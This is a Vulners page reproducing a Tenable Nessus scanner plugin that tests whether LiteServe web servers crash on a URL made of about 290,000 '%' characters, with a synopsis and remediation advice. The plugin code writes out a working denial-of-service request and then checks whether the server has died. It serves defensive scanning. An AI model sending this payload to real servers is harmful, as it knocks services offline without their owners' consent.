Lucene search
K

LiteServe HTTP Service Malformed URL Decoding Remote DoS

🗓️ 18 Nov 2002 00:00:00Reported by TenableType 
nessus
 nessus
🔗 www.tenable.com👁 345 Views

LiteServe HTTP Service may crash due to malformed URL, causing a denial of service attack.

Code
# 
# (C) Tenable Network Security, Inc.
#

# Affected:
# Webseal 3.8
#
# *unconfirmed*


include("compat.inc");

if(description)
{
 script_id(11155);
 script_version ("1.21");

 script_name(english:"LiteServe HTTP Service Malformed URL Decoding Remote DoS");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server may be vulnerable to a denial of service attack." );
 script_set_attribute(attribute:"description", value:
"The remote web server does not respond after it receives a URL
consisting of a long string of '%' characters. 

Note that if the web server is protected with some sort of Intrusion
Prevention Systems (IPS), this may be a false-positive." );
 script_set_attribute(attribute:"solution", value:
"If the web server does indeed crash when scanned with this plugin,
then upgrade or replace the server, protect it with a proxy, or
firewall it." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");

 script_set_attribute(attribute:"plugin_publication_date", value: "2002/11/18");
 script_cvs_date("Date: 2018/08/09 17:06:37");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 script_summary(english: "Sending a long string of % kills LiteServe");
 script_category(ACT_DENIAL);
 
 script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");
 script_family(english: "Web Servers");
 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);

if (http_is_dead(port: port)) exit(1, "The web server on port "+port+" is dead.");

r = http_send_recv3(method:"GET", port: port, version: 10,
  exit_on_fail: 0,
  item: "/" + crap(data: "%",length: 290759));

if (http_is_dead(port: port, retry: 3)) { security_warning(port); }

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation